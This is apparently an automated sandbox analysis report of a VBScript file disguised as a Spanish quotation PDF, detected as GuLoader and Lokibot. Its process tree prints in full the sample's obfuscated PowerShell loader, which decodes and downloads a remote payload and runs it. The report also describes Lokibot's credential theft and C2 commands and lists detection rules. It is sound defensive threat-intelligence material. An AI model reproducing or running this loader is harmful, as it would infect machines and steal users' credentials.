Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs

Overview

General Information

Sample name:Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:Solicitud de presupuesto 09-30-2024pdf.vbs
Analysis ID:1523153
MD5:5cc7cf5b0814e2f80bad4c4e85831e96
SHA1:93ed4011fc57034804feb5bd8ea61c6cf7b30cce
SHA256:12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6356 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7644 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8028 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8036 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8044 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8052 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8060 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8068 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8076 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8084 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8092 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8100 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8108 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • dxdiag.exe (PID: 8116 cmdline: "C:\Windows\syswow64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2356799011.0000000008860000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000B.00000002.2356962052.0000000009A96000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000B.00000002.2333844590.0000000005A7F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Process Memory Space: powershell.exe PID: 7364JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 4 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_7364.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_7644.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc7d5:$b2: ::FromBase64String(
                • 0xb84e:$s1: -join
                • 0x4ffa:$s4: +=
                • 0x50bc:$s4: +=
                • 0x92e3:$s4: +=
                • 0xb400:$s4: +=
                • 0xb6ea:$s4: +=
                • 0xb830:$s4: +=
                • 0x15e2c:$s4: +=
                • 0x15eac:$s4: +=
                • 0x15f72:$s4: +=
                • 0x15ff2:$s4: +=
                • 0x161c8:$s4: +=
                • 0x1624c:$s4: +=
                • 0xc075:$e4: Get-WmiObject
                • 0xc264:$e4: Get-Process
                • 0xc2bc:$e4: Start-Process
                • 0x16a8f:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
